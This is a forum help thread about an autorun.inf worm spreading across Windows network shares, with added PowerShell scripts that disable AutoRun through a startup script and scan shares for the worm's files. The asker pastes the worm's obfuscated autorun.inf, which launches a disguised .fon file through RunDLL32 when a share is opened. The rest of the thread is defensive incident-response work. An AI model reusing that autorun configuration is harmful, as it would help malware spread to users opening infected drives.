fireguy1125
asked on
Autorun.inf Virus Spreading Through network
Have a virus coming up as W32.SillyFDC.BDP!lnk and Bloodhound.Exploit.343 and also Symantec Intrusion Prevention is blocking TCP Traffic:
[SID: 23801] HTTP MS Windows Link File RCE 1 detected.
Traffic has been blocked from this application: C:\Windows\system32\ntoskrnl.exe
from various internal remote hosts, as this virus is spreading through what looks like network shares, as it appears on various server shares, and then on the user's computer when they open the share drive, there is a hidden autorun.inf file that contains the following:
[efmhubeq]
hetjgohsgiudjqluyhwveycirh=wqugjfhjxqrdbiunlwtdwmebaivssdnsocww
[amnhnrvycvwacxyplfebmbn]
wlqlkwpbetifpixvceekcqmdlmmdiyb=u
[autORuN]
aCTIon=OpEN
ljntb=tbbskdxwvkssjinucmhans
IcON=%wINDIr%\SYstem32\sHElL32.Dll,4
fkcixwufeovvwasjclgnrmp=pupra
useautoplaY=1
judvlknsjpyarjbxugwsbxph=ibsuamdxvg
OpEN=RunDLL32.Exe sETuP1911.Fon,aa4b94
yipuvpwxpgnviaoach=pbwuktokchqrckmwnwfjjxtbgjnihuomesls
shEll\EXpLore\CoMMAnd=RUNdlL32.exE SETup1911.FOn,aA4b94
uifqnvjjecpisiecukfbtxgomjpkvehm=ehjcrrvrde
sHElL\OPEN\cOmMAnd=RUndll32.ExE sEtup1911.fOn,AA4b94
llnkaevfqolexbniglqxqseamopohxxgile=kholcudayby
I'm going to all the servers, approx 30 of them and disabling the hidden shares C$, D$, and ADMIN$ and also putting in the reg key to prevent them from being recreated.
I need to push out a logon script for all the PCs in the domain to disable the running of autorun.inf files, because when the users open these shares, it just keeps spreading. Need instructions on how to assign this script to all the GPOs and have it run when the computer restarts.
ASKER
the admin$ shares have been disabled. I already have a batch file created with
regedit /s "\\fileserver\share\disableautorun.reg"
I put this in our \\domain.net\sysvol\domain.net\scripts folder, and associated it with the Users Group Policy in the User Configuration > Scripts > Logon > with it pointing to \\domain.net\sysvol\domain.net\scripts\disableautorun.bat file, however it doesn't seem to be running.
Should this be put in the Computer Configuration and run as a Startup Script? Or does it have to run as a user Configuration Logon script?
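As an added example (not the asker's batch file or anything posted in this thread), the registry changes that actually disable AutoRun machine-wide, written as a PowerShell script meant to be deployed under Computer Configuration > Windows Settings > Scripts > Startup. The values written are HKLM values, which is why a User Configuration logon script running as an ordinary user can look like it "isn't running": the user has no write access to HKLM. It assumes Windows XP / Server 2003 or later with PowerShell installed; the log file path is a constructed placeholder.

```powershell
# Added example, not from the thread: machine-wide AutoRun hardening intended to run as a
# Computer Configuration startup script, which executes as LocalSystem at boot. A User
# Configuration logon script runs as the interactive user, who normally cannot write the
# HKLM keys below. Assumes Windows XP / Server 2003 or later with PowerShell installed.

$ErrorActionPreference = 'Stop'
$LogFile = Join-Path $env:SystemRoot 'Temp\disable-autorun.log'   # placeholder location

$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
$IniMapKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf'

function Set-RegistryValue([string]$Path, [string]$Name, $Value, [string]$Type) {
    # Create the key if it is missing, then write the value (Type: DWord or String)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    Set-ItemProperty -Path $Path -Name $Name -Value $Value -Type $Type
}

function Disable-Autorun {
    # 1. NoDriveTypeAutoRun = 0xFF disables AutoRun for every drive type, including
    #    network drives (bit 0x10), which is how the mapped shares are being abused here.
    Set-RegistryValue $PolicyKey 'NoDriveTypeAutoRun' 0xFF 'DWord'

    # 2. HonorAutorunSetting = 1 makes systems that have Microsoft's AutoRun update
    #    actually respect NoDriveTypeAutoRun.
    Set-RegistryValue $PolicyKey 'HonorAutorunSetting' 1 'DWord'

    # 3. Map Autorun.inf parsing to a registry key that does not exist, so Explorer
    #    treats every autorun.inf (including the obfuscated one posted above) as empty.
    Set-RegistryValue $IniMapKey '(default)' '@SYS:DoesNotExist' 'String'
}

function Test-AutorunDisabled {
    # Returns $true only when all three settings are in place; run this on a workstation
    # to verify whether the startup script really applied.
    $explorer = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    $iniMap   = Get-ItemProperty -Path $IniMapKey -ErrorAction SilentlyContinue
    ($explorer.NoDriveTypeAutoRun -eq 0xFF) -and
    ($explorer.HonorAutorunSetting -eq 1) -and
    ($iniMap.'(default)' -eq '@SYS:DoesNotExist')
}

try {
    Disable-Autorun
    $status = if (Test-AutorunDisabled) { 'applied' } else { 'NOT applied' }
    Add-Content -Path $LogFile -Value "$(Get-Date -Format s) $env:COMPUTERNAME autorun hardening $status"
} catch {
    Add-Content -Path $LogFile -Value "$(Get-Date -Format s) $env:COMPUTERNAME ERROR: $_"
    exit 1
}
```

Save it into the SYSVOL scripts folder of the GPO and add it as a startup script with Script Name "powershell.exe" and Script Parameters "-ExecutionPolicy Bypass -File \\domain.net\sysvol\domain.net\scripts\disable-autorun.ps1" (your own paths), then reboot a test workstation and check the log and Test-AutorunDisabled. The same .reg import the asker already has would also work, but only from a Computer Configuration startup script for the same HKLM reason.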
Even if everything else works you should inoculate your network shares by running USB-Set on them. This app (free) creates a folder called autorun.inf on the drive and then creates 2 files within the folder, one of them hidden and read only. In this way if a user connects to your shared network drive and the computer attempts to install the autorun file, it can't (effectively - anything is possible).
You might also think of using USB Firewall: http://www.net-studio.org/
USB-Set: http://www.geekstogo.com/forum/USB-set-file378.html
ASKER
When I run the USB-Set tool, it says it does not apply to my OS, which is Server 2003 that has all the shares
Run it off an XP workstation that has access to the shares. This will see the network shares and inoculate them.
SOLUTION
ASKER
It only seems to be the following 4 files:
myporno.avi.lnk
pornmovs.lnk
setup1911.lnk
autorun.inf
I don't see an exe anywhere, and running malwarebytes, combofix, and symantec didn't produce any exe files.
It just seems to keep spreading the above 4 files and creating those links in shared mapped drives.
ASKER
Still awaiting feedback on my logon/startup script, and why it's not applying on workstations.
I have the same thing happening, I narrowed it down to 1 computer by verifying owner of the file. I have also narrowed it down to being created inside the svchost.exe process, unfortunately it is the main one so it appears to have infected one of the .dlls I am still trying to determine which one. By main one I mean the one which has automatic updates, bits, computer browser, hid... all that fun stuff in it :)
ASKER
What have you done to stop the spread? So far 3 of my servers have crashed with the error:
Windows could not start because of an error in the software. Please report this problem as: load needed DLLs for kernel. Please contact your support person to report this problem.
I've forced an update of the symantec client for all workstations, but it appears as though it is only detecting and not removing this problem.
I tracked the computer with the problem and unhooked it from the network. I use F-Secure, it finds a virus and says it removes it, but does not. (Exploit:W32/WormLink.C) I did have one server crash with the error you mentioned, I tried everything to get it back, ended up doing an in-place upgrade of the same OS over itself to resolve the issue. So I have mine isolated to a single laptop off the network right now trying to find what it is in case it hits again, but it is not affecting my network at all currently.
My testing is involving connecting a flash drive with nothing on it, watching it create the files, and going through killing threads one at a time trying to isolate it.
Oh also forgot to mention a few things I found with it late last week (it hit me last Thursday morning). It does not hit hidden shares, it seems to scan based on network neighborhood type functionality to find PCs and shares to copy the 4 files you mentioned into. So if you go through network neighborhood and browse each computer in order, using a clean PC with admin rights, you can find and remove the files from the shares. Sucky in a big network; the script mentioned above I would probably tweak to automate it. Make sure you do several manually though so you can locate the owner, mine showed as a PC name (computername$), like ones from the Active Directory computers container, and get those computers off the network ASAP.
SOLUTION
ASKER CERTIFIED SOLUTION
Yes it appears most antivirus companies and such have started to detect this now, guess I got in on the fun stage of before that. F-Secure is now finding it as a combination of Trojan.Agent.ASEB and Trojan.Injector.HI, this first machine it hit however looks clean and is not finding anything else, but is just not acting right, you get that "feel" from it so I am going to wipe it since it is a few years old and may be something else I'm noticing than this.
This question has been classified as abandoned and is closed as part of the Cleanup Program. See the recommendation for more details.
You could pipe through the results of NET VIEW from a command line and then copy the needed scripts, tools, etc. to each of the computers on your network via the Admin Share on the respective PC.
This may help..
http://www.robvanderwoude.com/ntadmincommands.php#Cmd14
HTH,
Kent
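Pulling together three pieces of advice from this thread (inoculating shares with an autorun.inf folder, browsing each computer's shares to find the four files and note their owner, and piping NET VIEW output), here is an added PowerShell example; it is not code from any poster or from USB-Set. It assumes you run it from a clean workstation with admin rights on the shares, that the browse list NET VIEW relies on is populated, and that the worm drops its files in the share root as described above. The CSV output path and the guard file name are constructed placeholders.

```powershell
# Added example, not from the thread: from a clean admin workstation, enumerate browsable
# hosts and their disk shares with NET VIEW, look in each share root for the four indicator
# files named in the thread, record the owner of every hit (the reply above reports the
# owner pointing to the infected computer account), and optionally inoculate clean shares
# with an autorun.inf folder. Usage: .\Find-AutorunWorm.ps1 [-Inoculate]
param([switch]$Inoculate)

$Indicators = @('myporno.avi.lnk', 'pornmovs.lnk', 'setup1911.lnk', 'autorun.inf')
$ReportCsv  = Join-Path $env:TEMP 'autorun-hits.csv'   # placeholder output location

function Get-BrowsableHosts {
    # NET VIEW prints one "\\HOSTNAME   comment" line per computer in the browse list
    net view 2>$null | ForEach-Object {
        if ($_ -match '^\\\\(\S+)') { $Matches[1] }
    }
}

function Get-DiskShares([string]$ComputerName) {
    # NET VIEW \\host prints "ShareName   Disk   ..." for each visible (non-hidden) share;
    # hidden $ shares are not listed, which matches the reply that the worm skips them.
    net view "\\$ComputerName" 2>$null | ForEach-Object {
        if ($_ -match '^(\S+)\s+Disk\b') { "\\$ComputerName\$($Matches[1])" }
    }
}

function Find-Indicators([string]$SharePath) {
    # The worm drops its files in the share root, so a non-recursive listing with -Force
    # (to include hidden items such as autorun.inf) is enough. -contains is case-insensitive.
    Get-ChildItem -Path $SharePath -Force -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer -and ($Indicators -contains $_.Name) } |
        ForEach-Object {
            New-Object PSObject -Property @{
                Path     = $_.FullName
                Owner    = (Get-Acl -Path $_.FullName).Owner   # e.g. DOMAIN\COMPUTERNAME$
                Modified = $_.LastWriteTime
            }
        }
}

function Protect-Share([string]$SharePath) {
    # Inoculation as described above: a directory named autorun.inf holding a hidden,
    # read-only file, so the worm cannot drop a file of that name in the share root.
    $dir = Join-Path $SharePath 'autorun.inf'
    if (-not (Test-Path -Path $dir -PathType Container)) {
        New-Item -Path $dir -ItemType Directory | Out-Null
        $guard = New-Item -Path (Join-Path $dir 'protected.txt') -ItemType File -Value 'autorun inoculation'
        $guard.Attributes = [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::ReadOnly
    }
    $d = Get-Item -Path $dir -Force
    $d.Attributes = $d.Attributes -bor [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::ReadOnly
}

$hits = @()
foreach ($h in Get-BrowsableHosts) {
    foreach ($share in Get-DiskShares $h) {
        $found = @(Find-Indicators $share)
        if ($found.Count -gt 0) {
            $hits += $found          # leave the files in place until the owner is recorded
        } elseif ($Inoculate) {
            Protect-Share $share     # only inoculate shares that are currently clean
        }
    }
}

# Sorting by owner groups hits from the same source machine together
$hits | Sort-Object Owner | Format-Table Owner, Path, Modified -AutoSize
$hits | Export-Csv -Path $ReportCsv -NoTypeInformation
```

Run it first without -Inoculate to get the owner list and pull those computers off the network, then clean the shares and run it again with -Inoculate. Admin$ shares are not needed for any of this, so it still works after the asker's change of disabling them.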